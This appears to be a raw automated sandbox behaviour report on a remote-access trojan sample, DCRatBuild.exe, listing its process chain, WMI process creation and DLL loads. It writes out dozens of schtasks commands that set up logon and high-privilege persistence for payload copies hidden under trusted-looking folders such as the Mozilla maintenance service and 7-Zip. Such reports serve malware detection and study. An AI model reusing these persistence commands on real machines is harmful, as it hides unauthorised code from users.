            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, uxL8lxfUvgFnXycRaue.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, uxL8lxfUvgFnXycRaue.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, uxL8lxfUvgFnXycRaue.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, uxL8lxfUvgFnXycRaue.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@46/27@1/1
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D66EC9 GetLastError,FormatMessageW,0_2_00D66EC9
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D79E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00D79E1C
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exeJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\Users\Public\Music\dfVXJbANbh.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
            Source: C:\Program Files\7-Zip\Lang\System.exeMutant created: NULL
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeMutant created: \Sessions\1\BaseNamedObjects\Local\f541aaea6d2bf9223ceae6326c30278ad0839797
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\Users\user\AppData\Local\Temp\p0UyIgWlzyJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainBlocksurrogateagentFont\qVwtNBtq7doCC7qZCII8cJUJd.bat" "
            Source: C:\Users\user\Desktop\DCRatBuild.exeCommand line argument: sfxname0_2_00D7D5D4
            Source: C:\Users\user\Desktop\DCRatBuild.exeCommand line argument: sfxstime0_2_00D7D5D4
            Source: C:\Users\user\Desktop\DCRatBuild.exeCommand line argument: STARTDLG0_2_00D7D5D4
            Source: DCRatBuild.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: DCRatBuild.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\DCRatBuild.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: DCRatBuild.exeReversingLabs: Detection: 63%
            Source: DCRatBuild.exeVirustotal: Detection: 54%
            Source: C:\Users\user\Desktop\DCRatBuild.exeFile read: C:\Users\user\Desktop\DCRatBuild.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\DCRatBuild.exe "C:\Users\user\Desktop\DCRatBuild.exe"
            Source: C:\Users\user\Desktop\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainBlocksurrogateagentFont\qVwtNBtq7doCC7qZCII8cJUJd.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ChainBlocksurrogateagentFont\portperf.exe "C:\ChainBlocksurrogateagentFont\portperf.exe"
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe"
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Users\Default\Videos\dfVXJbANbh.exe "C:\Users\Default User\Videos\dfVXJbANbh.exe"
            Source: unknownProcess created: C:\Program Files\7-Zip\Lang\System.exe "C:\Program Files\7-Zip\Lang\System.exe"
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Program Files\7-Zip\Lang\System.exe "C:\Program Files\7-Zip\Lang\System.exe"
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 6 /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LHgpusyvSo.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: C:\Users\user\Desktop\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainBlocksurrogateagentFont\qVwtNBtq7doCC7qZCII8cJUJd.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ChainBlocksurrogateagentFont\portperf.exe "C:\ChainBlocksurrogateagentFont\portperf.exe"Jump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LHgpusyvSo.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: version.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: amsi.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: edputil.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: netutils.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: slc.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: sppc.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
